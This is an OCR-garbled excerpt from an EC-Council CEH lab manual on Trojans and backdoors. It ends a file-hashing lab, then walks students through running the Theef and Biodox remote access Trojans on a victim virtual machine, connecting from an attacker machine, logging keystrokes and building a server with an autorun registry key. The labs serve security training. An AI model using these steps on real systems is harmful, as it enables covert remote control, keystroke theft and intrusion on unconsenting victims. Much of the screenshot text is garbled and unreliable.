mapped Network box.
Drive (Z:) of Virtual
Fsum Frontend v1.5.5.1
Machines _ Fsum Frontend
■j □ Tool*
. ______. . . %m. .........
I H-I‫ ־‬Calculatehaiht (_J haval224 (3) u haval224 (5) hava 1256(4) l_ h » v jl2 5 6 (5 )
u b*val224 (4) L h o v a l2 5 6 (3 )
&>*■ Q jihJK h □ m dl C l «nd4 (✓ m d * .| □ pananui
Tort □ /w ch
1 0 Verify checksur D pjw r32 n rip«m dl28 T 1 rlpem dlftO □ ripemd250 C ripemd320 C ‫ מ‬hash =
! G enera!• ch*ce 0 sdbm f l shaO D >h«1 □ »ha2 (224) C >ha2 (256) C 3h«2 (384)
; 8 8 O ptions 1 1 * 1 2 (5 1 2 ) n si:c64 f 1snc fru 2 128(41 T 1snefm 2 128 (81 r snefru2 256 W r snefru22S6f8> v
4 ‫י‬--‫ |־‬About


F ie \m
^ Co ^ 0 a | UkQ Encoding: | Base 16 (hexadecimal) v □ hw ac


W eb titt http:.'/fsu r> » eto j‫«< ׳‬ror3 e n e ! I

C E H L ab M a n u al P age 484 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

FIGURE 8.36: FsumFrontEnd checking md5.

37. Select a tile by clicking die File browse bottom from die desktop. That is
Fsum Frontcnd v1.5.5.1
Fsum Frortend
Q Tools □ M ethods ( 1 /9 6 )
L2 Calculate - 0 ‫ »ר‬11 ‫א‬
□ haval224 (J) □ hava!224 (4) □ h aval224 (S) C h a v a l2 5 6 (3 ) | hava!2S6 (4) Q ] hav3 2S0 (5)
j-c5 He
Q Have Autoruns : □ /hash □ jsh a sh □ m d? G m d4 B m d5 □ p M w r?
S 3 Verify chccksur ■•: □ p j"32 □ ripcmd128 G ripemdl&O E " 1ipemd256 E " ripcm d320 I is hash
automatically G eaerare check risdbm (~1 shaO Q shal □ sha2 (224) Q sha2 (256) □ sha2(3&4)
gH O ptions n « k a 2 CS12I (- I (17664 IH snefru2 128(4) I 1snefru2 128 (8) I snefru2 256 14) I snefru2 256 (1
execu te an J? | A bout :■

Internet search in Hash:

F ie |

your browser by =3 B , Encoding: |Base 16 [hexadecimal) v j O HMAC

selecting Search
Online in the Entry

W log

W ebsite h ttp r.'/fium fesoircerorge-ne:

FIGURE 8.37: FsumFrontEnd file browse.

& Autoruns B--EZ Fsum Ficntcnd

displays the text a - S Tools

: b-Z H Calculate hashes
□ Methods :96(
‫ ח‬idler? H ladlerl6 □ adler32 n ap hash |‫ |־־‬bdlcr
"(Not verified)" ;-•G3 Fie
:- 2 3 T ec
D ( b u 1 r .m p c g 2 [H «c8 □ crc16 □ ac16_ccitt ‫ ח‬crc15_ibm □ ac15_x25

j Q V »rifychK h 1
next to the AJ Generate ch«<

company name of 0 © '• :1 ‫נ‬

Orgenirc ’ Nev» folder
an image that ■ Desktop

either d oes not J| Downleads

Recent places A- Folder
have a signature
Ito a rits Network
or has a signature 3 Documents SK System Folder

J 1 M udr
that is not signed Pictures
MotiIIj Firefox

by a certificate 3 Videos fe 1.06 KB

Google Chiomc
root authority on flP Computer
Local D«fc (C.)
<r KB

the list of root 1—a Lccel Disk D)

Text Document
a Local Disk [&) 0 byte*
authorities trusted Filename: Test | a !I Files r . ‫־‬T

by the system 3

Website. http:Vfsumfc.50u ccfcrgc.‫* ׳‬ct

FIGURE 8.38: Fsum Front End file open.

38. Click Add Folder to select a folder to be added to die hash, for example,

C E H L ab M an u al P age 485 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

Fsum frontend v1.5.5.1 — I‫ם‬ x

B --IS Fsum Frontend
i) □ Tools | ‫ח‬ M ethods a / 95:
i 1- 1 ■I Calculate hasht
( J haval224 (J) [ J h«val224 (4) U h av a l2 2 4 (5 ) U haval258 (3) L havat25&(4) C h « v a l2 5 8 (5 )
‫־‬J “ ‫׳‬
!•••^Tort 3 H Q J‫ ז‬hJKh □ m dS L E ‫^ *ייי‬ L p a ru rra
K Verify checksur ‫ ח‬pj*32 n r i p « m d l2 8 M rlp e m d lftO P ripemd256 □ ripem d320 C ish a sh
j k Generate check ! □ »dbm □»haO □>hd1 □ »ha2 (224) C sh a 2 (2 S 6 ) ( I 384) 2««‫)נ‬
8 ij O ptions 1 ska2 (512) ‫ח‬ si:c€4 1 1 snc fru 2 123 (4) I snefw 2 128 (81 V snefru2 258 (41 T snef 1u 2 258 f8> v
Cow pare

F ie l)ACEH-T0cls\CEHv3 M odule 06 Trojans a nd BackdoorsNFiles and Folder Integrity C h e d teiV sum frontend1.5‫ _ |־‬.

^ |_ 0 1 Encoding: |G ase 16 (hcxadcdmal) v| Qj HMAC

GflAutoiuns prefixes the File

name of an image's
publisher with "(Not
verified)" if it cannot verify a
digital signature for die file
that's trusted by the system


1t e L o JV =

W ebcit• http:7f1um fe to arc afo rg e .n et 1

FIGURE 8.39: FsumFrontEnd Add Folder.

Fsum Frontend v1.5.5.1
Fsum ficntend
H-b2 Tools ‫ |"־‬kMhwfe (1/ 96‫! ׳‬
I B -t3 Cakuiatehashes | ghj!h3 L 9^-‫נר^ז׳‬ LI 9*‫ז*י‬ LlhailfiO U havelVA (3) |_| Koval128 (4) I_h«v«n2ac5)
j I i d«t _JhMl160(3) Q_hBv9il60(j} □ havall 60 (5) □ hava!192(3) □ h«v«l192 (A) □ havaH92[S) Ch«r11224{3J
j I 23Tea □ hav?C24 (4) Q tav*224 (5) □ hav8B56G) Dhaval256(4) □ hav8l256 (5) Qjhash Cjsh* h 5
: H i Verify checksum (4es
•- £ Gen&ilt checksum fi
Q m d2 Cmu 5jm d5 □ panama □pjw32 □ ripemd128 C ripemd160

:••05 Options
□ rip«fnd256 C! fipemdSZQ □ rshash [I!sdbm □shaO [ !dial Cshi2224)
Hash Browse For Folder ‫־‬H
File Dt\CB4-T00IACE CheckerSfsumfrontend-'‫ז‬cadrnt•jC

1‫־‬-i “•‫*“יי״‬
t• A Administrator
A Computer
t f a Local Disk (CO

I | CW«I 1
£3 A "Hide Signed iL .___ —

Microsoft Entries" option

helps you to zoom in on
third-party auto-starting
images that have been added
to your system

FIGURE 8.40: FsumFrontEnd Adding Folder.

39. Respective tiles o f die selected folder will be listed 111 a list box.

C E H L ab M a n u al P age 486 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

II Fsum From end v l .5.5.1 ‫ ז‬- ! u H |

14■_2 Ftum fk■>t«nd
a U ‫ ד‬ooi 1 □ Maihodb <1 / 96(
: m t J CakulatohMhtt
□ h*aH600> [ »wvaM60(4} [ |haval1G0(3) [ Ih^al192 (3) C hav.1152 (4) 1 |h«vaU92(5) I havaC24Q)
: T«! □ Krv»LL4 (4) (‫•** ־‬vrfiMlS) ‫|־־‬hav.l2S6<3) D H«v«l2S6 (4) □hav.l2S6<S) r ) |h » h ~ |» K « h
(9J V»1f, checksum 14c. f~~l tm&? ( kmM v jaid) panama 0 pJwS2 | |np*mdl28 r1pr<nd160 ■
: G«n«r«'.t c^*Jaum fi Q ry « n d 2 * L npem dlM Q n h i* [ju lb m Q1b»0 [_| ‫י*ייי‬ Q tlu2(2M |
cJJ Options rf*?(25« 1 4»?(164> l*a?(S12) f wr(W ‫ ח‬mefru2128(41 I I1nefru2 128(8) »«rffu?2%W
File Dt\CB4-Too(>'CEH. 3 Module 06 T1cyans and BackdooisSFiles and Folder Integrity Checke\fsorrtfrontend•1.S.S.1Vftadme xa .
■_y j a :3 Fi ‫*■׳‬ f i LJ Encoding: Base 16 (hexadecimal) v] (~HMAC
^ D:\CrM-IochvThun1tM-db
(P0\C Bt-T M lA CB t4 Lab Prere—
0■ D‫־‬.'.CB+T0c!s\CEH/8 Lab Prere-
® D :\aH -T 0cl5\CEH-e lab Prerc-

0 ‫ ז‬oc(s\CEH/S Lab Prere_

£3 t>\CFH-TocisxCEH/S lab Prere_
j i j D:\CH4-Tocte\C£!-(•<€ Lab Prere_
S t D\CEH‫־‬Tocb\Cil‫־‬fv6 Lab Prere_
4J0.\CEH-Toob‫׳‬vCB+^ Lab Prere_
^D'.CTH-TochSCEH<€ lab Prert—
<| 111 | > ‫ ן‬- j[>\C£H-TochvClHv6 lab Prere_

Log -

Wrr \1le Mlpy/ltumfe 1c.‫׳‬.rfc«1jr

FIGURE 8.41: FsumFiontEnd files list.

40. Click Generate checksum files. The progress bar shows the progress
percentage complete for the hash tiles generated.
Fsum Frortend v1.5.5.1
Fium Fiontend
a LZ Tools ‫ ה‬Mrihodk (1 96 ‫)׳‬
: H 1 Cakuiatehashes
]h*al160G) [ te,*160:4} □ havall 60 (5) H]haval192 )5( □ hav*1192 (4) C]haval192 [5) □ K* 41224 31
I j 23‫־‬ Ted II (‫| ־‬K^^t224«4» [‫ ־־‬havtim (5) □ h‫״‬v.l2S6(3) )H haval2S6 )4( □ hav«l2S6 (S) 0 *‫י*»י‬
I fep Verify checksum 14es - 11» U r ‫«״‬ 3 •ndS r !-‫״‬-‫*״‬. □pjw*2 I |npemd128 ^ nprmdlfcO
: £ Generate checksum f! _]np«m«£i6 I npemdl2£] Qrehsdi ! ‫ * ־‬dbm Q*h»0 U*•“1 [!***2C224J
Options 14a? (256) I *»2GS4) ‫ * ח‬02 )512( r lsoc6» 5ncfru2128f41 I Isnefru2 128 (8) ?nrfru2 256fi
Hash |
File D:\CEH-Tools'C EH.3 f.lcdu e 06Trcjans ard Backdcois'sRIes and Folder Integrity CheckeAfsumfrontend-'.5.5.lMtadme‫־‬£

Q Autoruns will Fie

> 13 F | | E£j y Encoding: Base 16 (hexadecimal) ~v] □HMAC

display a dialog th\CB‫־‬MocHvThum*>vdb

(SPD.CtM-Tooh\CtH^ Lab Prere-
0■ D‫‘־‬.CEHT0cls\CEH/S Lab Prert_
with a button that O D:\CtH-TooH\CtHve Lab Prgrg-

enables you to re• B 0 ‫־‬.aH -IooH \CIH 4 Lab Pr«‫׳‬f_

^ 0:\CfH.Too»5SCfHv« lab Prert_

launch Autoruns D\CIH IeeWvC(M/fl lab Prcrc‫״‬

E 0 .\C lH -Ieo<i\CIH4 Lab P‫׳‬v«~
#)DACB4 Toob\C&+‫ «״‬Lab Prtrt-
with ^ D '.CfH Tooh\CfH*« lab Prcrr-
|4J D\CtM- 10eh\CIHw6 lab Pr*r»...

FIGURE 8.42: FsumFiontEnd Generate checksum files.

C E H L ab M a n u al P age 487 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

Fsum Frontend * 27%

Ir Ku‫׳‬n fantcnd
a •1 . Too•* ‫ ־‬iMalhodbtWKt
W C«kul4l*hMh«1
ltw H 6O 0) I twval1«>(4) lhavaH60(5) [ h*‫׳‬aM92(J) □ h«v«H92 (4) |h«val1M fS) h*r«B24 31
1 N ■ ‫״‬ 4)224) • ^ ‫) ר‬ r *WV4224 IS) 1‫ ־‬h«v#l2St><J> r |4) □ h.v.l2S6(S) ‫״‬J il h « h
n !h « h
; (9.J Vwif, Lhw.Uun.t4c, ~ }m d / r [ imiwmim —|nprmdl28 liprm dlM
‫׳‬-•j j 6«nwj : «th*ckium 1i □ S* [ _ 1*pemdl« _J«h‫ ״‬h □ ihnO |«h*1
I ;••cli Option* shM? 064) l*w?(S1?) r W fis Wffru212«(41 Iinf#ru2 1?8 (8) W#ru22 K M
I :. . j 3 About

File C vLa .V . &‫׳‬. y.. ,.CtsktopvTtst.UX

Encoding: Ba.e 16 < v □ hmac |

O You can also use the -e File ‫׳‬nd5

D:\CEM-1oc :1 vThuubvdb B16B0289...
command-line option to I^D.CfcH-ToctsvCEH/* Lab PrtfS- C482F590‫״‬
launch initially launch ■ D:\CB+Toc!s\CB+<e Lab Prere-
SH ttO H -T 0c»5\CEH*labPrerc_
Autoruns with
5 3 D'.CfcH-1octs\C£H/S Lib Preffc_ 007C8321-
administrative rights 3 DACEH-Toc*s\C&+/* Lab Prcre_ D22FF2CC...
j i , D:\CB4-Tock\C£R.« Lab Prrrr_ 3B85A96A...
D:\CEH-Toc(s\C£Hv6 L«b Prere— C783050E7A7741C269A3S127BA6FMA7 |
£)DA<B4-T oo&C B*« Lab Prere- E8ECEDSA...
< ^I>\CFH-Toc^CFH-eHbPrerc_ 08*2202-

j - , Log -

Re C:'U»*S\Admin««rjw<\0«ktop\Testt«t
mdS: D41DeCDS»0CKGa13®09OGICFW2r£
1 Extcuton: (XkOCfcOOCOI

Rc ft'CEH-Too•?‘Thunb^. db
II <1

1p, ‫׳‬llurri'f lOU'tffcXgF

FIGURE 8.43: FsumFrontEnd progress of hash files.

41. The following is die list o f 111d5 tiles after completion.

& CEH-Tools are

also located
mapped Network
Drive (Z:) of Virtual

FIGURE 8.44: FsumFrontEnd list of hash files.

Lab Analysis
Analyze and document the results related to die lab exercise. Give vour opinion on
your target’s security posture and exposure dirough public and free information.

C E H L ab M an u al P age 488 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M odule 0 6 - T rojans and Backdoors



1. Scenario: Alice wants to use TCP View to keep an eye 011 external
connections. However, sometimes there are large numbers o f connections
with a Remote Address o f "localliost:####". These entnes do not tell
Alice anything o f interest, and the large quantity of entnes caused useful
entries to be pushed out of view.

2. Is there any way to filter out the "localliost:####" Remote Address


3. Evaluate what are the other details displayed by “autoruns” and analyze the
working of autonuis tool.

4. Evaluate the other options o f Jv l6 Power Tool and analyze the result.

5. Evaluate and list die algonduns diat FsumFrontEnd supports.

In tern e t C o n n ectio n R eq u ired

□ Yes 0 No
P latform S up p o rted
0 C lassroom 0 iLabs

C E H L ab M an u al P age 489 E tliical H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M odule 0 6 - T rojans and Backdoors

Creating a Server Using the Theef

Tbeef is a Windon•s-based applicationfor both the client and server end. The Theef
server is a vims that yon install onyonr victim's computer, and the Thef client in
nhatyou then use to control the vims.

ICON KEY Lab Scenario

/' Valuable A backdoor Trojan provides remote, usually surreptitious, access to affected
systems. A backdoor Trojan may be used to conduct distributed denial-of-
S Test your service (DDoS) attacks, 01‫ ־‬it may be used to install additional Trojans or other
k n o w led g e_______ forms o f malicious software. For example, a backdoor Trojan may be used to
* Web exercise install a downloader 01‫ ־‬dropper Trojan, which may 111 turn install a proxy
Trojan used to relay spam or a keylogger Trojan, which monitors and sends
£Q! Workbook review keystrokes to remote attackers. A backdoor Trojan may also open ports 011 the
affected system and thus potentially lead to further compromise by other
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
stealing valuable data from the network, and identity theft.

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor
JT Tools The objectives o f the lab niclude:
demonstrated in
this lab are ■ Creating a server and testing the network for attack
available in
■ Detecting Trojans and backdoors
Tools\CEHv8 ■ Attacking a network usmg sample Trojans and documenting all
Module 06 Trojans vulnerabilities and flaws detected
and Backdoors
Lab Environment
To carry tins out, you need:
■ T heef tool located at D:\CEH-T00 ls\CEHv8 Module 06 Trojans and
Backdoors\Trojans Types\Rem ote A c c e s s Trojans (RAT)\Theef

C E H L ab M an u al P age 490 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

■ A computer running Windows Server 2012 as host machine

■ A computer running Window Server 8 Virtual Machine (Attacker)
■ Windows Server 2008 mnning 111 Virtual Machine (Victim)

■ A web browser with Internet access

■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains m alicious or harmful code inside apparently
harmless programming or data 111 such a way that it can get control and cause
damage, such as mining die file allocation table on a hard drive.
Note: The versions of die created client or host and appearance o f die website may
differ from what it is 111 die lab, but die actual process of creating the server and die
client is same as shown 111 diis lab.

Lab Tasks
M TASK 1 1. Launch Windows Server 2008 Virtual Machine and navigate to Z:\CEH-
Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote
Create Server
A ccess Trojans (RAT)\Theef.
with Pro Rat
2. Double-click Server2 10 .exe to run die Trojan on the victim’s machine.
* T‫׳‬ojans T /oes » denote Ac:e5s ‫ ־‬roiars (RAT) » Theef

L °‫*ז‬°
I » I Date modi-ied I - I Type M Sire H
I 0 . COOararr.n
‫י‬ Ctontt10.**•
Edacrvcr 210 e>e
I pass s
j readn-e.txt

ciders v P|B9B9EBB
1 !■3upx.exe
Cemnond Shell ~rw * I ^
JA Defacenent 'ro ja rs
^ D estruave T'coans
| . Ebanang Trojans
Ji E-Mal T‫׳‬ojans
F P T ro ja r
£ GUI Trojans
i-rrTFH‫־‬TPS‫ ־‬r )ars
i t ICMP Bcddoor
^ MAC OS X Trojans
^ Proxy Ser\er Trojan:
Remote Access “rtge
^ Atelie‫ ׳‬web Rem 31
k). DarkCorretRAT __
^ ProRst

FIGURE 8.1: Windows Server 2008-Theef Folder

3. 111 the Open File - Security Warning window, click Run, as shown in die
following screenshot.

C E H L ab M an u al P age 491 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

Open File - Security Warning

The publisher could not be verified Are you sure you want to
run this software?
Name ...emote Access Trojans (RAT)\Theef\Server210.exe
I] Publisher Unknown Publisher
Type Application
From Z:\CEHv8 Module 06Trojans and Backdoors\Trojan...

Run Cancel

This file does not have a valid digital signature that verifies its
't publisher. You should only run software from publishers you trust.
How can I decide what software to run ‫ל‬

FIGURE 8.2: Windows Server 2008-Secuiity Warning

4. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06

Trojans and Backdoors\Trojans Types\Remote A ccess Trojans
5. Double-click Client210.exe to access the victim macliine remotely.
|P. qTT” 1 A p p lic a to r took Theef

| Home Share View Manage v©

‫&־ «־־‬
• ‫ ״‬Trcjans Types ► Remote Access Trojans (RAT) ►Theef v | (j | | Search Theef fi |

Favorites £ c c ip a ra - n .n i

■ D esktop | Cl c rt2 '0 .e x e j

£ D ow nloads iflj Ec'1tser\er21 C.exe

^ R e ce n t places pcss.dll
| rea d m e, tx:

3 9 Libraries "‫ «׳‬Scanner.dll

[ 1 D o cu m en ts ■ Sever2IO .ex6

J ' ‫ ׳‬M usic ■ J upx.exe

m P ictu re s <6 zip.dl

|j Videos

H o m e g ro u p

f f 1 C o m p u ter

tim Local Disk (C:)

V CEH Tools ( \\1 0.0.0.

N etw ork

9 items 1 item selected S22 KB

FIGURE 8.3: Windows 8-Running Client210.exe

6. 111 the Open File - Security Warning window, click Run. as shown 111 die
following screenshot.

C E H L ab M an u al P age 492 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Open File - Security Warning

T h e p u b lis h e r c o u ld n o t b e v e r if ie d . A r e y o u s u re y o u w a n t t o r u n th is
s o ftw a re ?

Nam e: ...p e s \R e m o te A ccess T ro ja n s (R A T )\T h e e f\C lie n t2 1 0 .e x e

S3 P u b lis h e r U n k n o w n P u b lis h e r

Type A p p lic a tio n

F ro m : Z : \ C E H v 8 M o d u le 0 6 T r o ja n s a n d B ackd o orsN T ro ja ns T...

Run C a nce l

T h is f ile d oe s n o t h a ve a v a lid d ig ita l s ig n a tu re th a t v e rifie s its

p u b lis h e r. Y o u s h o u ld o n ly ru n s o ftw a re f r o m p u b lis h e rs y o u tru s t.
H o w ca n I d e c id e w h a t s o ftw a re t o run?

FIGURE 8.4: Windows 8-Security Warning

7. The maui window o f Theef appears, as shown 111 die following screenshot.
‫ ׳‬n e e tv ^ iu 1^ 0‫־‬


■>‫׳‬ Port 6 703 FTP 2 968

Connect Disconnect

A ☆
Th eef version 2.10 01/No‫׳‬.‫׳‬ember/2004

FIGURE 8.5: Theef Main Screen

8. Enter an IP address 111 the IP held, and leave die Port and FTP tields as dieir
9. 111 diis lab we are attacking W indows Server 2008 ( Click
C onnect after entering die IP address o f Windows Server 2008.

C E H L ab M an u al P age 493 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

T T 7Tieef v 2 10


Port 6 703 FTP 2 968

Connect Disconnect

C omputer inform ation

FIGURE 8.6: Theef Connecting to Victim Machine

10. Now ill W indows 8 you have access to view the W indows Server 2008
machine remotely.
ro -h e e fv .2 .1 0

Connect - Port 6 703 FTP 2 968

Connect Disconnect

[15:05:31] Attempting connection with

[15:05:31] Connection established with
[15:05:31] Connection accepted
[15:05:31] Connected to tran sfer port

A % •Qj SY &
Connected to server

FIGURE 8.7: Theef Gained access of Victim Machine

11. To view die computer information, click die Computer icon at die bottom
of die window.
12. 111 Computer Information, you are able to view PC Details. OS Info, Home,
and Network by clicking on die respective buttons.

C E H L ab M an u al P age 494 E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

C om puter Inform ation

Reply PCDetails re ceive d

FIGURE 8.8: Theef Compute! Information

13. Click die Spy icon to capture screens, keyloggers, etc. o f die victim’s
p r TTieef v.2.10

C om puter Inform ation

User name: Administrator

Computer name: WIN-EGBHISG14L0
Registered organisation: Microsoft
Registered owner: Microsoft
Workgroup: [Unknown]
Available memory: 565 Mb of 1022 Mb
Processor: Genuinelntel Inte64 Family 6 Model 42 Stepping 7 (3 09 5 M hz)
Display res: 800 x 600
Printer: [Unknown]
Hard drives:
C:\ (6,186 Mb of 16,381 Mb free)

PC Details <#] OS Info ^ 5 Home Network

FIGURE 8.9: Theef Spy

14. Select K eylogger to record die keystrokes ol die victim.

15. 111 the K eylogger window, click die Play button to record the keystrokes.

C E H L ab M a n u al P age 495 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Keylogger [Started]

FIGURE 8.9: Theef Keyloggei Window

16. Now go to W indows Server 2008 and type some text 111 Notepad to record
die keystrokes.
Keylogger [Started]

[New Text Document.txt - Notepad]

Billy U have been hacked by the world famouse

tv <? ©
FIGURE 8.10: Theef recorded Key Strokes

17. Similarly, you can access die details of die victim’s machine by clicking die
respective icons.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on
your target’s security posture and exposure dirough public and free information.

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Module 06 - Trojans and Backdoors



T o o l/U t ilit y In fo rm a tio n C o lle c te d /O b je c tiv e s A c h ie v e d

O u tp u t:
T heef Victims machine PC Information
Victims machine keystorkes

1. Is there any way to falter out the "localhost:# # # # " remote address entries?

2. Evaluate the other details displayed by “autoruns” and analyze the working
of the autonins tool.

In tern et C o n n e c tio n R eq u ired

□ Yes 0 No
P latform S upported
0 C lassroom 0 !Labs

C E H L ab M an u al P age 497 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Creating a Server Using the Biodox

Theef is a Windons based applicationfor both the client and server end. The Theef
server is a vims that yon install on your victims coup!iter, and the Theef client in
nhat yon then use to control the virus.

ICON KEY Lab Scenario

/' Valuable You are a security administrator o f your company, and your job responsibilities
inform ation
include protecting the network from Trojans and backdoors, Trojan attacks,
T est your theft o f valuable data from the network, and identity theft.

— W eb exercise Lab Objectives

ca W orkbook review The objective o f tins lab is to help students learn to detect Trojan and backdoor
The objectives o f the lab include:
‫י‬ Creating a server and testing the network tor attack
‫י‬ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all
vulnerabilities and flaws detected

& Tools Lab Environment

dem onstrated in
th is lab are To earn‫ ״‬tins out, you need:
available in ■ B iodox tool located at D:\CEH-Tools\CEHv 8 M odule 06 Trojans and
D:\CEH- B ackdoors\T rojans Types\GUI T rojans\B iodox Trojan
Tools\CEHv 8
Module 06 Trojans ■ A computer running Windows Server 2012 as Host Machine
and B ackdoors
‫י‬ A computer running Window Server 8 Virtual Machine (Attacker)
‫י‬ W indows Server 2008 running 111 Virtual Machine (Victim)

‫י‬ A web browser with Internet access

‫י‬ Administrative privileges to nm tools

C E H L ab M an u al P age 498 E tliical H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains m a licio u s or harmful code inside apparently
harmless programming or data 111 such a way that it can g e t control and cause
damage, such as mining die file allocation table on a hard dnve.
Note: The versions of die created client or host and appearance of die website may
differ from what it is 111 die lab, but die actual process of creating die server and die
client is same as shown 111 diis lab.

Lab Tasks
m TASK 1 1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06
Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
Create Server
with Pro Rat 2. Double-click BIODOX OE Edition .e x e to m n die Trojan on die victim’s
r w ‫־‬ ' A p p lic a to r took B io d o x

I 1 Home Shaic Vievr M anage v ©

0 -* ) t « ‫ ז‬, ‫ ־‬, , n sT y p c s ► G U IT rojans ► B o cox T iojen ► Biodox v | C, | | Search Biodox

* .
Favorites Jl. L an g u a g e

W D esktop Pbgns

£ . D ow nloads ; 3 BI3COX CE Edition.e<e]

R e ce n t places ' Lee m e


3 9 Libraries j * MSW1NSOCOCX

H ) D o cu m en t? A r e s .q f

M usic g sew ings.ini

B P ictu re s
|§ j Videos

FIGURE 9.1: Windows 8-Biodox Contents

3. 111 the Open File - Security Warning window, click Run. as shown in
following screenshot.
Open File ‫ ־‬Security Warning

T h e p u b lish e r c ou ld n o t b e v e rifie d . A r e yo u sure you w a n t to run this

so ftw a re ?

Name: ...I T ro jan s\B iodoxTrojan\B iodox\B IO D O X OE Edition.exe

P u b lish e r U n k n o w n P u b lish e r

Type: A p p licatio n

From: Z:\CEH v8 M o d u le 06 Trojans and Backdoors\Trojans T...

Run Cancel

This file does n ot have a v alid d igital signature that verifies its
publisher. You should o n ly run software fro m publishers yo u trust.
H o w can I d ecide w hat software to run?

FIGURE 9.2: Windows 8-Security Warning

C E H L ab M an u al P age 499 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

4. Select yourpreferred language from die drop-down list in die Biodox main
window: 111 diis lab we have selected English.
Biodox Open Source Edition

£ 3 commun
A passw or
m anage
msn se tt
Og settings________
0 system information
(51 ; f in m anager
y commands
f1 c aptu re
server properties
local tools
|w c o n tac t us

C o rrec tio n Poet

f f Cermet tkn 6061 ua>
g T ransfer 6662
B s< r# * n 6663
5 W ebCam 6664

User Name Computer... Admin

S t a t u s : R e a d y ... C o d e d By W h o ! | w h o @ t ik k y s o ft .c o m
-------- ---
FIGURE 9.3: Windows 8-Biodox main window language selection

5. Now click die Server Editor button to build a server as shown 111 die
following screenshot.
Biodox Open Source Edition

□ . -----------
- Fake Error Message ‫־‬
3 commenfcaton
£ ‫ ־־־‬passwords
manage fifes
□00 ; Msg Title Error* | Test M essage |

‫ נ‬keyboard |biodox w a s here

I P /[ * S -
5P msn settjnos
Adress: Message Icon :
$ settings manage'
O systenr r 1fo‫־‬m a o x 1 © ‫צג‬
‫ יוד‬f in m w aoff r Victim Na
gp> commands N am e:
Connection; |6 6 6 1 | Screen Capture; |6663 |
\J^ capture
5j strver nropprtiet T r a n sfe r:|666? | webcam C apture: |6664 |
Connection Delay ‫־‬
[‫ ־‬connection
local tools
M contact us QUvf^l c#<‫־‬. for conrwtioi

O Windowo O Temp 0 Sy8tem32

-Regetry Settings‫״‬
Server Mode‫־‬
K *y: mssrs:
(•> Gizli Mod O Yardyrr Moou s
C orrection Pxt
*3 Connection 6561
S T ransfer 6562
? ? Screen 6563
5 WebCam 6564

Admin | Opera tin... | Cpu | Ram Coentry

Status : Read/... active / deactive status

FIGURE 9.4: Windows 8-Security Warning

6. 111 Server Editor options, enter a victim’s IP address in die IP/DNS field; in
diis lab we are using W indows Server 2008 (

C E H L ab M an u al P age 500 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

7. Leave die rest o f die settings at dieir defanltd; to build a server click die
Create Server button.

Note: IP addresses may ditter 111 your classroom labs.

Biodox Open Source Edition
Server Editor
| H 7

!13 com m uucaton

£ passw ords
m anage files
□ 0 0 Msg Title : |ErfQH I

keyboard Message : |biodox w a s he re

-IP /D fs S -------
msn settings
A d re ss: 110.0.0 13| Message Icon :
settings m aT age‫־‬
^ systen- 1n fo ‫־‬m aton © ‫צג‬
■» f i r m anager
commands N am e: |v‫־‬ictim
C onn ection: [6661 | Screen C a p tu r e : [6663 |
2 j se rv e r properties T r a n s f e r :|6662 | webcam C apture: [6664 |
1- Connection Delay —
■‫*׳‬f k>:al tools
'‫ )ץס‬contact us Dday|i0n **C
O Windows O Temp 0 5ystem 32
-R egistry S e ttin g s‫־‬
■Server Mode -
K ey : m ssrs3 2
© Gizli Mod O Yardyn‫ ־‬MoCu 0
V akje : m ssrs3 2 .e x e

C orrection Port
? 5 Connection
® T ransfer
? ? Screen 6563
S WebCam 6564

Vetim Marne IP Adress UserNarre Computer... Admin Operatin... Cpu Ram C ouitry

Status : Ready... create server

FIGURE 9.5: Bodox Main Screen

